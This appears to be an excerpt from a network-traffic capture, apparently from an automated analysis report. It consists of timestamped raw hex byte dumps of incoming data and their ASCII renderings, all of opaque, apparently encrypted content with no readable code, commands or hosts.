                                                                                                                                                Data Ascii: s_HZZd6!N"n,_X}"|lm-bh_!f@V;RDB$| 0GcvB]]ZG/<D%;v$AD#n9\bObOHF;u&W7~RS)%yL+)Sl$0/\=^/C).&"26
                                                                                                                                                2022-09-29 12:49:26 UTC4367INData Raw: 54 5a ae 7b 73 61 9c 5f db 19 95 24 c5 4c 37 b5 87 c9 5a f9 94 9b 49 9c 2f 74 8a 7f a9 31 dd 72 04 bc c4 44 60 5e 9e 54 81 51 b3 8a 77 3e 48 aa a3 3a ca 15 df 81 df cf 75 3c e3 d3 51 47 0c ff c4 bc ce 74 42 a5 97 50 ef 1c 95 d2 fe 2c a5 ae 85 42 97 5b be fa bb 96 21 8a a2 60 57 87 47 d4 c0 66 ac 09 ed 92 5d c2 ee f3 2f 65 a9 06 f1 a6 a4 7e 47 34 48 39 61 29 61 03 91 50 75 9b 79 f8 8c db 69 4c cc f5 ad ff ea d4 ee f3 5f ad 1e fc 20 fd bd b1 36 88 ef 73 71 81 03 2f 3b 6d 47 fc 4b 1a 94 70 46 7c 4f ff 3c ec bf 05 6f 01 f8 dd 84 e7 6e 05 e4 cf 5f 36 2d 2b 0f 1f 97 b8 06 ec 4d f5 6e f4 d2 e4 b3 9e cb 9a 7e d4 6c b6 87 56 02 45 79 33 17 0a 49 3f 18 2a dd ec 78 56 19 1e 1d 50 1f 79 23 94 2f 0d f3 78 98 5e 7a 7e 1d 4a 54 57 15 90 46 86 d2 08 ad 77 ae 5c 21 90 e5
                                                                                                                                                Data Ascii: TZ{sa_$L7ZI/t1rD`^TQw>H:u<QGtBP,B[!`WGf]/e~G4H9a)aPuyiL_ 6sq/;mGKpF|O<on_6-+Mn~lVEy3I?*xVPy#/x^z~JTWFw\!
                                                                                                                                                2022-09-29 12:49:26 UTC4383INData Raw: c3 dd 35 e5 28 0d 54 40 4e c2 d4 fd d0 92 78 d7 85 9f 06 8c 00 ef a5 1e e4 8c c6 69 ac f8 fd 23 b5 4c 22 3f 6a 08 42 2f de 1b f8 16 73 06 87 67 6f 91 e1 3e 48 bb 76 a9 a2 cf 0b 5f 11 19 85 85 ec e0 27 f0 32 7d d7 ea f2 89 18 87 e9 df 3e 64 80 c9 b6 83 a4 0a ab 0b c0 b8 f0 e4 1e 06 bf f8 75 b2 3f 8d 6f 58 32 91 dc 0b 62 ac a2 fa 5b 94 cc 01 7f c9 42 db 2e b1 0b 24 49 6d 9b cf 3f 3d c7 f9 d2 33 b2 cc 19 f0 ad c2 b2 3c 27 64 c4 80 74 3c 80 42 b2 91 8a fc a2 95 31 1d 67 7a 5c f0 c0 0d be 5b 8e 8d b0 bd 9c 03 1f 69 cd 28 8b e3 4a 87 8f ba 70 e5 19 19 37 2a 20 54 70 05 d3 d3 e3 b1 12 65 b9 50 ec 1c fc 51 cd 35 1d c1 e4 ed 96 ad fb 4e c7 d2 96 69 13 42 7a a8 e7 b8 ec 2e e5 a5 62 9f c9 23 7d b5 4a 15 f6 ab 67 e3 cc 0d 96 f3 95 46 1a 81 61 c2 1a 15 0f 65 ed ab 99
                                                                                                                                                Data Ascii: 5(T@Nxi#L"?jB/sgo>Hv_'2}>du?oX2b[B.$Im?=3<'dt<B1gz\[i(Jp7* TpePQ5NiBz.b#}JgFae
                                                                                                                                                2022-09-29 12:49:26 UTC4399INData Raw: 59 fa 7d 54 e5 b7 f6 83 76 54 51 a1 59 de 61 3a 0e a1 9f fe a9 7a 04 92 0c 8d 1e 90 99 69 77 2a d6 cb 51 8e 90 a6 8b 10 6c 26 cb 59 1e 46 ee 4d 16 d4 25 32 59 b6 ff 4f 9e 57 57 58 47 fa bc 0b f8 1e 54 83 76 83 64 03 c1 26 1d c1 8f bb 22 df a5 9d f7 c6 ee 4f d7 bf 2f f0 a5 a1 00 d2 4e 10 56 de d1 1a 47 61 76 56 7b ac 09 73 8d 82 de 68 fa d7 2e 80 73 90 a9 3b d3 88 5f 98 fc 7e 3c ab c3 9e 44 49 f8 b1 78 d0 20 50 a7 95 d8 3d 3c 5e 7d 29 99 3a a3 be fe 0a 70 2b da 83 6a e7 a4 36 03 a5 2b 5d ad 7c 97 fd 7d 3c c5 a6 12 aa 2d 61 35 b8 6f c7 e7 7b 01 46 05 53 2b 31 27 f8 5e 0f b6 bf 1a 16 d7 ca 0e b4 e5 1b d5 da 7d 44 53 1d 47 41 90 97 b4 20 73 ce 9f e5 8d ed 02 92 85 cf a6 f3 68 1e 7d 93 d6 90 0e c2 43 92 c6 ba 03 1b a3 b8 76 60 2a c3 27 99 eb ae aa 39 fc b9 ee
                                                                                                                                                Data Ascii: Y}TvTQYa:ziw*Ql&YFM%2YOWWXGTvd&"O/NVGavV{sh.s;_~<DIx P=<^}):p+j6+]|}<-a5o{FS+1'^}DSGA sh}Cv`*'9
                                                                                                                                                2022-09-29 12:49:26 UTC4415INData Raw: 46 35 b0 0a e9 08 27 b1 f0 d2 be 9f ba cf e1 d5 ad 7f 47 25 fd b4 b1 b1 8b 1e f2 7f 35 40 37 41 3a 77 c7 8b fc 0b 7d 97 af 97 f0 d5 df 82 81 62 76 d0 27 13 9e e9 9d ef 1c 43 5c 5c 84 ea 63 9b 6b 7c 8d dc f7 17 2e 18 5b 28 2d 33 79 5a 37 68 6e 5e 16 5d 3a f6 7c 62 c6 81 54 81 f9 0e 8c b5 f1 79 90 6e 52 a1 16 f1 6e a3 31 4c e9 cd ee 96 f7 d6 f8 ae 47 99 a2 d2 3f 45 24 3b af 32 f3 4f 31 ae 48 a9 09 16 a7 d4 6d 27 29 1b d5 4c 60 66 99 cf 0e c5 99 ab d4 96 e5 9b 6f ca 16 6f dc ad cd df 66 b9 1a 80 44 29 35 d0 2f 3b a9 9a 2c 3b f6 e7 48 2c 8c 2f c3 98 04 0c 2c ca 4b 3f fd 9e bc 70 84 4d 19 0f a9 00 dd 14 d7 9c cb 6f 72 41 67 60 95 3e c1 06 96 e7 ca 9d 4c 50 bb 31 c3 63 df 12 ad 87 e7 20 a2 c7 de 59 68 f5 47 d7 7f c8 e2 d2 0b 70 8f 7d 29 20 cb 88 d1 9e d7 1f 01
                                                                                                                                                Data Ascii: F5'G%5@7A:w}bv'C\\ck|.[(-3yZ7hn^]:|bTynRn1LG?E$;2O1Hm')L`foofD)5/;,;H,/,K?pMorAg`>LP1c YhGp})
                                                                                                                                                2022-09-29 12:49:26 UTC4431INData Raw: 1d f1 2f 57 61 d0 9f ce 9c 65 c9 df 40 e8 43 53 9d 6d 47 0c e7 09 ee 5e a0 5a f2 ff f5 4f 48 9b 28 52 80 fa 1c f2 08 d8 7f ac 1c bc 32 42 b8 3c 7b fc cd 1b 95 a0 f6 23 6f f8 a1 7f de 34 ad d2 d3 87 62 6a fd c7 a9 3c 22 05 2c 6a 8b c6 7b 38 7e fa ad 64 7b 7d a0 d9 0e 4b ff 06 08 7a 4e fe ae 0c a8 87 a3 36 89 e4 07 63 b6 63 be a1 1e c9 89 39 80 a2 94 07 cf 3b ad 6a d3 bb f5 32 1b a0 f0 c6 e0 c5 9b 89 8d 91 3f aa 17 12 46 4d d7 f4 24 6f f0 c9 79 f0 6a aa de d6 7a ef d3 0a c5 27 37 34 77 59 3f 7c 93 b6 c6 a7 56 fa b9 16 21 a1 bc 18 f1 d2 5e ce 32 f7 03 dc a9 1b a6 f4 4a aa 67 61 be 7e 22 0b e8 85 7f 47 a3 13 94 20 d3 c4 17 cb 68 a6 58 07 ed 0f 16 56 35 d3 ec 9c fc c7 44 91 93 5c 5f ca f8 21 b0 0f 30 b0 19 99 a4 a6 f5 eb c2 de d0 5e ed b9 ee 68 37 59 d8 0e 1d
                                                                                                                                                Data Ascii: /Wae@CSmG^ZOH(R2B<{#o4bj<",j{8~d{}KzN6cc9;j2?FM$oyjz'74wY?|V!^2Jga~"G hXV5D\_!0^h7Y
                                                                                                                                                2022-09-29 12:49:26 UTC4447INData Raw: e4 d3 73 21 d8 d5 d1 07 31 a9 ae d7 00 1a 8e 15 3f ba e1 9d 77 66 49 47 57 b8 15 68 90 e9 17 38 38 8f a8 90 be ec e4 4b 27 8a cb 72 d1 73 0b 81 33 ba 1c 3b 90 44 a1 07 41 7e d4 a7 d5 84 1c 01 23 fa 97 6e e1 3d 32 72 2c 43 68 49 2b 5b 35 4f ea 6d 1d 87 2b 1f a7 c9 a4 56 af 6f c5 3e 1e dc 18 25 8e 1b 8f 92 0d df eb 95 73 42 e9 f1 f5 7f 10 b0 d9 a0 a8 46 1f 7e bd 89 c6 e6 35 c6 c4 8a 31 b2 d4 44 45 0a a8 51 c6 04 99 02 1b ac 36 db 5c d3 ff 18 d2 97 2f a2 13 b5 34 06 05 ea 40 0d a3 7b ee 61 ed d4 b7 fe 3f 3d 13 37 1c e9 28 f9 69 38 74 db 35 aa 5c e4 7b ba c8 3f be c1 95 db 18 45 26 aa 28 8b 14 58 67 ed b3 2b e8 6a 92 b7 0c 30 1f 54 d9 09 22 1e 32 4f 4a 53 12 e6 ca 22 71 56 1c 33 06 f7 93 ac 80 eb 65 35 5d 65 5b 29 fe 1b c3 9b e9 fc 54 1b 28 d0 9c 53 60 95 2b
                                                                                                                                                Data Ascii: s!1?wfIGWh88K'rs3;DA~#n=2r,ChI+[5Om+Vo>%sBF~51DEQ6\/4@{a?=7(i8t5\{?E&(Xg+j0T"2OJS"qV3e5]e[)T(S`+
                                                                                                                                                2022-09-29 12:49:26 UTC4463INData Raw: f9 13 60 2f 27 00 ba cf a7 69 88 9d 1e e1 76 32 d9 c0 7f e6 af 3c ac f3 6f f4 f9 8c 8c 86 7a c4 99 25 8c e5 f3 93 be 2c b5 5c ba fe 91 d7 3d eb f9 61 97 13 61 e3 a0 ad 72 d9 2a 30 85 85 da 06 4d 50 61 8b 1f 03 25 42 3c b6 93 2b 18 43 0b e3 67 00 93 d3 75 6c c6 62 ad c5 c3 e6 3b 52 6a 08 20 90 f6 8a b2 14 f2 dd da 29 f6 ec 9d 8a 45 ce 33 0b 9f 61 5d b6 0d a4 1f a1 80 e1 ad 41 79 05 16 2a f7 a5 23 e0 d9 d5 52 7b ab 34 b3 d2 61 8d b3 06 c3 e4 d4 bc 2c 1d 87 f6 9e 11 43 1e 4d 3b 62 53 e9 a3 e9 71 9a e7 80 ae 59 c4 ae 36 68 a0 01 c7 83 e5 a6 ac c4 68 37 4e 5c 2e d0 d9 4e b8 ec 18 e4 72 35 86 04 de fd cf c0 e4 4c 71 c1 53 71 0b 47 e9 ff 0b ad 60 29 df 16 90 8f 5a 43 d6 40 c0 2a 38 2b 38 6d 53 d0 4c d1 03 a0 43 35 f1 82 47 08 99 6a 0c 03 0e 28 20 f0 55 a3 c2 57
                                                                                                                                                Data Ascii: `/'iv2<oz%,\=aar*0MPa%B<+Cgulb;Rj )E3a]Ay*#R{4a,CM;bSqY6hh7N\.Nr5LqSqG`)ZC@*8+8mSLC5Gj( UW
                                                                                                                                                2022-09-29 12:49:26 UTC4479INData Raw: c8 d7 df df 21 00 d3 9c c9 e7 6a 22 d8 1a 3c 17 ad 26 6c 74 b4 ba ba ae b9 bd a3 7e 49 36 1c c2 bb 0b 53 c9 99 53 22 74 e7 0b 4c a7 9d ae d9 8b bc cd 25 b1 68 36 79 ad b6 31 0d af 0c 38 21 77 d9 e6 24 00 0e 6a 87 50 ba 62 a6 e9 5b fe b2 e1 00 95 b5 35 72 0c 3e e7 4e f6 80 70 70 cf 49 45 f7 93 cf 30 da 23 92 8c b4 e0 e0 15 0c c5 b4 e6 3f d9 85 a8 cb 92 f5 0f d4 72 c3 37 02 20 e5 fd cd 32 23 14 b3 e8 bf 07 37 b5 d7 f8 ed 6b da 6f 6b d0 bf e3 89 e3 85 35 69 af d5 93 23 f6 22 60 4a 06 49 12 13 c1 fd 66 2a bd 25 05 9d 8d a0 fd 99 f2 38 b8 e4 41 64 4e bd e5 df 96 25 c0 f6 2b 53 a9 7c 49 00 23 61 22 dd 15 e7 b8 b2 bb af 0c af 25 a4 2c 10 ab e1 45 7a a0 9d 99 bd c8 96 eb 28 d0 d3 67 46 29 87 48 33 f5 a0 8e 04 7f 00 4d 8b e7 72 0a a6 04 d0 4a 2e 62 bc 10 70 c9 c8
                                                                                                                                                Data Ascii: !j"<&lt~I6SS"tL%h6y18!w$jPb[5r>NppIE0#?r7 2#7kok5i#"`JIf*%8AdN%+S|I#a"%,Ez(gF)H3MrJ.bp
                                                                                                                                                2022-09-29 12:49:26 UTC4495INData Raw: bb c5 9f c9 a3 eb 64 0b 19 88 43 04 67 61 df 5a 6c 94 8e 61 6a a8 d0 99 f4 3a 75 0f 5d 18 da 91 c8 50 da c6 bd 32 00 31 b6 7d 41 93 34 e0 9a ae 30 28 4a ed 6f 96 ca ae 4b 21 09 2b 0f 7d c9 ca 40 22 d4 40 82 95 e9 0e a4 2f 60 dd 32 c9 c4 95 fc dc 32 e0 da cc 43 a2 8f a5 71 b8 56 ee 91 f6 9a 6d 2a bf fd 92 c6 db f3 6f c5 d4 b2 8a 37 6e bf 9e 83 c9 27 b7 77 d4 7e c2 de 4c 88 f0 ca 48 cb 57 66 9e a9 46 bb d3 e2 03 ae 8e d5 36 cf 60 d7 35 3a 07 4e e4 2e 31 9b ba af fe 57 a3 81 41 e0 52 23 0a fb 55 e2 7e 86 8a 61 81 3d 26 7b f3 1b eb 2c 31 1d d2 f3 72 4c 83 17 7e 26 cc 71 56 de 81 2b 6c e1 73 93 aa c4 b1 a3 4f 35 58 92 4b 5c af 34 c8 10 75 49 2a 44 1f dd 05 b1 75 1e e8 76 38 34 b2 41 c6 e4 12 02 69 7a 9e 7a d6 cd 83 2c 84 06 74 0e ca d7 07 ca ed 25 47 6d 60 73
                                                                                                                                                Data Ascii: dCgaZlaj:u]P21}A40(JoK!+}@"@/`22CqVm*o7n'w~LHWfF6`5:N.1WAR#U~a=&{,1rL~&qV+lsO5XK\4uI*Duv84Aizz,t%Gm`s
                                                                                                                                                2022-09-29 12:49:26 UTC4511INData Raw: 0b e7 89 e0 d9 54 26 4a 68 09 76 95 25 b5 5d 69 69 2d d8 e5 5a b5 09 5a bf 75 c6 56 7f 3b 86 1d e5 33 c8 a3 c7 71 7e 0a 79 e5 d8 90 1c 59 e8 1c 78 0b 52 89 5d cd de fc 00 e8 7b 9a 2e b4 71 27 3c 1e 44 7f f4 27 11 58 d2 8c 69 a2 76 65 b5 45 2f 29 8c ca 95 49 3e 80 ee 01 29 57 74 72 15 45 e3 9e 26 3a e5 9f fc af 37 19 5b 3f 75 f5 fd fc 0b c8 cb 20 42 5f 42 f2 8d 9c 70 b4 79 52 2d 48 f2 51 2b 1e 5f 41 cd cd 1b 6f d9 1a 1b 98 4f 8f 16 7d 18 05 cd 9b e5 59 2a 26 96 a2 b5 57 c5 f1 0e 2a e6 6c 50 3a b6 85 4a c7 f4 65 6a fd b4 f5 0d 88 49 b2 df 70 da d9 58 56 13 c6 12 09 3f 0b 46 3b 65 6e e5 b7 50 eb 5c 3a 3d 46 ba 45 50 e0 18 f3 76 2f 8b 8a 3c a6 94 58 56 cf 92 0b c3 92 c2 80 27 67 ce 4b f6 ed e1 19 57 22 f0 a8 dd 7d be 20 ac 16 19 b9 1c 6e 2b 7d b6 3d d4 6f bb
                                                                                                                                                Data Ascii: T&Jhv%]ii-ZZuV;3q~yYxR]{.q'<D'XiveE/)I>)WtrE&:7[?u B_BpyR-HQ+_AoO}Y*&W*lP:JejIpXV?F;enP\:=FEPv/<XV'gKW"} n+}=o
                                                                                                                                                2022-09-29 12:49:26 UTC4527INData Raw: cf a6 49 51 fa 03 65 75 7c 81 c6 fa 9f 6a 91 a4 19 1d 1d c5 b0 0d 6d 99 c8 26 01 f9 0a 09 4c ba 97 53 c8 ad d4 54 0f 3a 49 37 4b 08 37 32 c5 9f d4 6e 25 14 64 28 25 5f 05 c5 28 0a 2e dd 40 db 2c 40 93 25 14 53 ac 43 1c 27 c2 74 1a 91 27 8b 9e 17 5b 07 62 11 c4 b7 47 6b 39 6b 9e fa 07 63 bb 99 8e 3e b1 e9 47 70 2c e7 df e6 83 42 e3 6a d2 2e 21 f2 99 7d 4b 2e 29 94 f2 c7 f4 cc ee a7 74 18 4b 76 15 a8 52 9e f5 2c 43 c3 5e 4d 8b e4 cc c5 17 3f 89 01 17 31 22 cc 7f 7d 97 8b 18 e6 ca 89 61 e8 a3 e6 30 25 e3 8b f7 1a aa 0f 8d 14 47 62 41 be 2a 9d d5 95 7e e4 23 42 8c 4c d6 fa d8 50 74 fe 0a a5 c3 16 c1 e2 ff 99 df 76 1e bf 60 28 cd c9 89 46 2d 18 7b a1 10 95 a0 89 23 87 20 6d 5e 91 81 e0 ed f4 a1 07 da f3 aa 83 11 3d 5f f4 7b 51 9d 98 b2 11 ea 0c 5d 0c 43 5e 3a
                                                                                                                                                Data Ascii: IQeu|jm&LST:I7K72n%d(%_(.@,@%SC't'[bGk9kc>Gp,Bj.!}K.)tKvR,C^M?1"}a0%GbA*~#BLPtv`(F-{# m^=_{Q]C^:
                                                                                                                                                2022-09-29 12:49:26 UTC4543INData Raw: ae 32 96 51 71 6f a8 c6 68 e4 18 e1 8f bf b9 b7 44 86 e7 83 5a 87 8f d7 be 80 5a 56 b1 f3 ba 2b ff 56 67 ca 10 48 24 b6 ba ce 7a 20 16 eb 7d 57 dd 82 ab 89 43 fe 04 be 3d 4d 96 46 de ca 56 27 9e fe 74 78 e8 06 7c 59 5c 28 e1 5a 23 af 68 4c af 87 4b 07 79 e0 34 79 06 cb f3 c8 f3 ba 59 a3 50 19 15 29 25 f7 76 14 8a ff 08 80 fa 0c 1b dc 80 3a 2b a6 8d 33 f1 f4 73 8e a4 f5 4e 74 ff 9d 74 20 4e 41 49 15 c0 d7 8f 05 64 1a a8 68 fd 2a 77 91 91 cc b1 b5 8c 02 43 4a bb ed 8f 43 bc bb 56 e7 e9 ad 6e 2f 31 8f 1b 3e bc f8 5e 3d f0 43 6a c2 69 b4 70 4b 60 52 cd bd c8 a0 93 e8 ba e7 f0 04 38 f0 27 8b e8 55 f3 71 ad 42 de 01 e9 12 fc 30 94 9a 5e 9f 48 61 b2 5a db 0f f6 27 2b 83 73 33 df 2b 7a 4c fd 6d 06 4c 08 20 d1 db fb 2d 80 3c 2d a6 cb 85 51 2b 72 bf 0b 9c bd a0 9d
                                                                                                                                                Data Ascii: 2QqohDZZV+VgH$z }WC=MFV'tx|Y\(Z#hLKy4yYP)%v:+3sNtt NAIdh*wCJCVn/1>^=CjipK`R8'UqB0^HaZ'+s3+zLmL -<-Q+r
                                                                                                                                                2022-09-29 12:49:26 UTC4559INData Raw: 20 ed 67 7b d9 f0 08 65 0c 1f e9 a7 8b 94 33 eb 42 45 c4 f3 8e 89 df df d8 80 f0 05 e7 1d f7 28 92 b6 2c df 63 e8 22 b0 a9 52 5d 9d c3 fc 8e fc ec e1 4a b8 ac 0b cc db b8 d5 2f 43 c7 43 65 cb ea e0 4c 31 d2 28 9a c3 11 f0 2e 27 c3 3f 2c 94 60 10 e2 30 c2 63 a6 da 90 9d 2f 42 38 77 dd cc 4e 5c 1b 3e b2 f4 65 5f 2d 7d 76 43 35 38 a1 d9 00 b6 bb c9 87 2a 62 2e 25 ab f3 b8 d3 b3 d9 de 55 f8 19 0c ac 04 85 06 08 bf 4e 27 28 73 ac 61 af cb a7 40 8b ac 98 95 47 0f ef eb 3c bf d0 16 a0 2f 10 57 ec 86 03 c6 29 bb 09 1f 79 71 59 c6 ce 57 8e 20 7d 52 e0 b9 38 71 c1 32 75 df a1 f9 3e d4 ed d2 04 f5 65 fd d8 ce 21 3f 72 e4 30 97 d3 be 18 69 28 ab b6 3c af a9 aa 83 09 5e 09 d5 41 b3 a9 8e a8 ac e7 0f b4 cc 01 e9 9c 3f b2 b9 35 ea bc 2f 9d a3 b8 6c db c2 3f 97 ea a1 e5
                                                                                                                                                Data Ascii: g{e3BE(,c"R]J/CCeL1(.'?,`0c/B8wN\>e_-}vC58*b.%UN'(sa@G</W)yqYW }R8q2u>e!?r0i(<^A?5/l?
                                                                                                                                                2022-09-29 12:49:26 UTC4575INData Raw: 07 19 df 5f 61 71 74 7b e9 50 8c 3f 6b d4 1f cc 22 3e 7c ba 5c 6b 47 07 06 64 69 dc 17 9c ba 98 1c 9f c2 39 d9 28 42 36 cf b7 2b e5 a3 0c 08 9f 36 e8 cf c8 3e bc 68 d6 6a ee 22 1e 2a 77 93 88 2a f6 e4 4a d0 f2 1e 03 a5 f7 4c 9c a3 e2 c2 06 bb f5 7a 25 6f b9 03 de 30 ed 8d 14 85 59 2b 18 c6 69 4b 4f 50 8a a5 89 36 62 19 99 35 5d 9b 79 fc 57 ec e2 2f 25 03 96 5e 7e c6 6d 6d ef ff 9b ae 6a b8 1b 33 f2 f6 2f 5e 9c f1 2f 77 91 3b 3a 1b a2 0a 89 b2 d0 99 b7 b4 fd 59 1d b7 89 94 4d 8d fd c9 10 3f 3b aa 48 ed de c3 e9 68 12 72 39 22 33 98 3f 8c 33 2d 3d 3f 29 7b e2 e5 e6 4b 9d 22 18 2c 63 1b ee 3d 25 ae 03 78 09 2c 38 41 69 78 3b a0 58 e7 a4 88 63 3e 47 01 1e 2d 65 86 66 0f a4 46 1f 07 d5 a3 07 8a 52 47 6e 5b 57 7c 0e be 9c c0 56 a1 cc 75 ad 4b ba 75 47 9c b3 83
                                                                                                                                                Data Ascii: _aqt{P?k">|\kGdi9(B6+6>hj"*w*JLz%o0Y+iKOP6b5]yW/%^~mmj3/^/w;:YM?;Hhr9"3?3-=?){K",c=%x,8Aix;Xc>G-efFRGn[W|VuKuG
                                                                                                                                                2022-09-29 12:49:26 UTC4591INData Raw: 98 d3 2b f7 5e f9 8b 18 21 62 15 de 48 11 e8 3a 92 53 f2 c4 6c 42 81 38 84 18 b0 a3 cb 27 79 d8 fa b1 68 f7 82 df fe 1d d7 16 a0 f4 8a 9f 3f de 88 68 e4 7c 7e 85 9a 45 63 31 d6 29 73 c0 39 81 db 7b 73 c7 25 4d 26 aa 30 d5 05 bd 4b 42 65 d0 34 0e 3d e1 39 99 d2 62 d4 8d 0f 8f 57 79 4c 9c b3 9a 6d af 58 09 c8 cc d6 9a c1 95 4b 6b be 4e ae 11 ae fd 73 ce ab 4e 81 aa a1 6b fe 05 ff 26 b9 6f 24 e7 0f af ea 40 5f 78 d1 89 04 fd 3c d5 c3 df 0b a0 e4 25 e1 0d 1f ca 75 73 2a 70 66 30 f9 32 80 52 6b f8 0b d1 e2 85 e4 b8 87 e5 06 90 97 3d e3 50 b9 25 6b e2 26 c6 73 9c 8c 6d 5c 5b 6f 4c 75 ad 43 6e 89 34 eb ef a2 9e 6f 9c b0 f9 da 63 3d 5c 7e f5 f0 d0 f0 07 28 f7 7e 77 05 f0 30 70 07 2e d3 45 76 81 6d 87 90 5d bb 89 7f 43 6b b0 8f e5 59 94 33 ec 84 4b 08 05 a2 d1 2b
                                                                                                                                                Data Ascii: +^!bH:SlB8'yh?h|~Ec1)s9{s%M&0KBe4=9bWyLmXKkNsNk&o$@_x<%us*pf02Rk=P%k&sm\[oLuCn4oc=\~(~w0p.Evm]CkY3K+
                                                                                                                                                2022-09-29 12:49:26 UTC4607INData Raw: 21 7c 49 f0 4e 86 e6 fd d0 20 60 40 28 74 7a 39 82 ad c2 2a 46 4a c9 14 1b ca b5 de 3a c8 3d a3 38 34 46 58 fc c1 1c 67 98 ad e4 b7 49 b4 b6 fb b8 9d 4c 6a 1a c9 af eb d7 76 4d 3a f0 09 e1 04 68 4e 57 dd ab 10 c7 62 a0 29 dd 63 9b 27 b0 c2 c3 cb 81 94 8d 76 5b 91 2b a4 69 49 ad 18 4f 67 01 c4 6f 66 d5 72 38 de 1e 92 2b 15 2d d8 28 73 e8 28 e1 31 ca de db b0 e9 7f 22 d2 6f 75 c6 af 74 2c 22 ba 9f e8 65 c5 06 46 40 79 bf b0 cc b1 b3 04 b4 a4 f7 5d fe be ca 8c 7a f9 31 6c 93 52 de 63 2e 73 d4 a4 da 5a 8e 92 f1 6d 21 1d ac 7c 61 02 df 41 d3 4b 8e 15 32 7f 14 25 68 4f 4b 70 70 87 89 a9 20 54 ec ca dd ab 89 c1 66 20 70 5e 34 08 1a 4e aa a4 0b af ac e5 bc 11 0e 05 d6 ad d3 95 8a 35 a2 27 71 fa 5a f1 89 43 db d0 e7 c0 ea 8a 0b a4 ca 60 d1 de 61 09 c4 c1 0e e4 36
                                                                                                                                                Data Ascii: !|IN `@(tz9*FJ:=84FXgILjvM:hNWb)c'v[+iIOgofr8+-(s(1"out,"eF@y]z1lRc.sZm!|aAK2%hOKpp Tf p^4N5'qZC`a6
                                                                                                                                                2022-09-29 12:49:26 UTC4623INData Raw: 58 74 c9 e2 b2 bf 08 12 38 5f 39 ee 83 89 d2 86 36 33 b5 47 00 6c 3c c9 a4 99 ca 40 f5 90 e8 17 38 4a 31 4d 98 ae 82 ed d9 32 03 36 67 c7 fc a3 b9 46 26 b7 02 ad a0 3f f6 f2 42 51 65 3f 7b dc a6 0f 4a 3c e1 48 0d d6 9c e2 65 0c f5 94 55 70 6b 25 f0 a8 12 40 cd 34 2f b3 9f 94 45 03 4f 18 44 dd cf bc aa 55 70 06 1d 5e 52 5d 28 d6 3a 6f db 10 ea d6 6b 33 9c 45 eb 4a a6 b9 8f 13 d3 3b 28 48 4d 87 1c 57 05 2c 8c a8 22 00 64 b7 b6 d7 d9 4a 80 1c e5 19 be 1c 0c 3f ba 44 03 f9 74 74 2c 5d 1e d4 4d 89 67 2c 92 16 85 a6 1f ab 2f 6f b0 f5 24 e0 db 4c 54 4a fc 69 d8 26 3d ea 3c 93 f6 3c 89 66 43 c6 e5 6f ca 0a 80 b6 ae 71 42 45 f9 4d de e3 cf 1c 64 2a 56 77 61 0d 2d 9c 95 00 af 0a 61 a4 0b 19 40 b1 9f 34 8d 56 04 72 28 d7 0c c8 c2 e1 b9 00 f2 d8 40 8a 31 89 4b d4 9b
                                                                                                                                                Data Ascii: Xt8_963Gl<@8J1M26gF&?BQe?{J<HeUpk%@4/EODUp^R](:ok3EJ;(HMW,"dJ?Dtt,]Mg,/o$LTJi&=<<fCoqBEMd*Vwa-a@4Vr(@1K
                                                                                                                                                2022-09-29 12:49:26 UTC4639INData Raw: 9e 82 5e 2d 78 9e e1 d9 0a b8 d1 01 da 88 24 a7 07 fc 21 42 3f 97 fd 4a f9 a7 5d f1 6c 6c a4 25 c2 76 99 10 e9 b1 4e 87 81 14 b6 90 3f 3b 15 12 16 4f 21 5d 42 ea ec 36 25 1b 63 d9 bd 96 9f 44 d2 bb d7 d7 bb 21 19 d5 01 b0 a7 75 aa f0 db 06 01 83 3f 03 46 1e bf 47 24 ae 45 7a 51 f3 ba ee 78 32 05 5c 89 ec 62 d9 b6 1d 85 fb 83 6d 2b 5d 9f 54 6a 40 f6 96 77 73 d0 c3 26 3c c0 e4 ac 92 3e 85 fe 31 2f ad f9 03 9a 70 90 97 fb 3b c4 2c 9a 07 69 bd 19 60 77 94 bc ea 39 a8 86 84 f4 d9 e9 6f 3f 3c e8 45 81 4b db 75 10 34 74 64 0a a0 92 c3 9b 01 75 93 9f b3 d9 13 86 27 64 6d 5f b9 f6 56 43 a7 96 4b e0 b7 89 53 aa 1f 2d f0 60 0f c6 16 e0 cc dd 46 2f 50 68 f8 77 4f 77 ff 81 c9 24 1d b1 67 43 d9 40 e4 c9 b5 b2 63 ff 5b e8 8e 0f 6a bd 72 e6 0b 41 92 03 85 7f 3c 0a ae 86
                                                                                                                                                Data Ascii: ^-x$!B?J]ll%vN?;O!]B6%cD!u?FG$EzQx2\bm+]Tj@ws&<>1/p;,i`w9o?<EKu4tdu'dm_VCKS-`F/PhwOw$gC@c[jrA<
                                                                                                                                                2022-09-29 12:49:26 UTC4655INData Raw: 31 85 02 62 62 1f 55 28 ac 71 b4 0a dc 1f 41 d2 76 30 f6 d3 a1 26 75 8f e2 64 23 d9 48 d3 90 cd 89 d8 97 d5 87 21 dd 38 dc 51 64 11 80 fa 57 20 28 aa d1 9e 4f ff a7 98 95 89 c8 db 64 09 64 e1 cc 7c da 19 ab 9c b7 e8 95 da c5 6f 3a 6b 52 67 6e e6 b4 26 80 04 52 26 bf e5 cb 04 98 62 8e 7c f7 6a b7 98 ff 72 2a 0c 1f fc 91 3c 3e 7b b5 98 6d 7a 69 e4 96 26 1c b5 4f aa 0d dd d8 b4 6f 98 c0 1d c9 f4 c9 ca 58 ac 85 e4 56 57 ef b7 53 84 1f 73 d3 fb f0 ac 21 42 67 48 92 3d 26 3b 5a ef 41 c8 11 a6 6f 36 0e bc d6 03 61 06 c6 52 49 3b 01 1a 9b e1 0d 3d be 11 ec 2d 30 6a 69 ce 89 a8 bd 02 9c a6 b0 24 49 28 35 d0 5f 36 e7 65 6c 2a 51 33 6e 9e ae d1 0f a8 b3 ac c2 77 f7 71 5d 6d c0 7e da f3 bc 4b 8b 85 3e 6e 6f 89 69 6b 3a 76 68 4c 6c a6 85 ec 97 0f 7d 95 4a 54 82 d1 8e
                                                                                                                                                Data Ascii: 1bbU(qAv0&ud#H!8QdW (Odd|o:kRgn&R&b|jr*<>{mzi&OoXVWSs!BgH=&;ZAo6aRI;=-0ji$I(5_6el*Q3nwq]m~K>noik:vhLl}JT
